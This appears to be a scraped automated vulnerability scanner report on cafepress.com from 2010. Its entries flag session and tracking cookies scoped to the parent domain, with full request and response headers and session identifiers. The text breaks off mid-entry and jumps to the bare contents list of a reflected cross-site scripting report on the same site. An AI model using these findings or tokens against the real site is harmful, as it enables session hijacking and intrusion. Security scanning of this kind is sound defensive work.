Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59393
Date: Sun, 26 Dec 2010 13:46:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/
Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.20. http://www.cafepress.com/+ipad-cases previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+ipad-cases

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+ipad-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 88266
Date: Sun, 26 Dec 2010 13:44:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 88266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.21. http://www.cafepress.com/+iphone-cases previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+iphone-cases

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 65212
Date: Sun, 26 Dec 2010 13:48:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/
Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.22. http://www.cafepress.com/+journals previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+journals

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+journals HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59322
Date: Sun, 26 Dec 2010 13:48:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.23. http://www.cafepress.com/+keepsake_boxes previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+keepsake_boxes

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+keepsake_boxes HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 59018
Date: Sun, 26 Dec 2010 13:48:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.24. http://www.cafepress.com/+license_plate_frames previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+license_plate_frames

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+license_plate_frames HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 59931
Date: Sun, 26 Dec 2010 13:48:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/
Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.25. http://www.cafepress.com/+magnets previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+magnets

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100214; domain=cafep

cafepress.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in cafepress.com | Vulnerability Crawler Report

Contents 1. Cross-site scripting (reflected)

Contents

Issue background

Remediation background

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Contents
1. Cross-site scripting (reflected)